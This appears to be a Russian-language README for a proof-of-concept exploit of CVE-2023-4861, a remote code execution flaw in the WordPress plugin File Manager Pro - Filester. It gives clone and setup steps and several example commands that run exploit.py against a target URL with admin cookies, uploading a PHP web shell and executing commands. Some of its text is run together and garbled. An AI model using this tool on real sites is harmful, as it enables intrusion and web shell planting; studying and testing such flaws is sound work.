
Proof of Concept для CVE-2023-4861 в Filester
Этот репозиторий содержит Python-эксплойт (PoC) для CVE-2023-4861 — проблемы аутентифицированного удалённого выполнения кода в плагине WordPress File Manager Pro - Filester.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+ в Filesterexploit.py автоматизирует тот же базовый результат, описанный в публичном бюллетене безопасности:
/var/www/html/ и разрешить загрузку .php.Важная деталь реализации: мой PoC предполагает, что корневой каталог сайта — /var/www/html/. Это значение жёстко зашито в данных запроса и может потребовать корректировки для других лабораторных сред.
Клонируйте репозиторий и перейдите в него:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
Установите зависимости:
pip install requests
Показать справку:
python3 exploit.py --help
Базовый пример:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
Необязательное пользовательское имя шелла:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'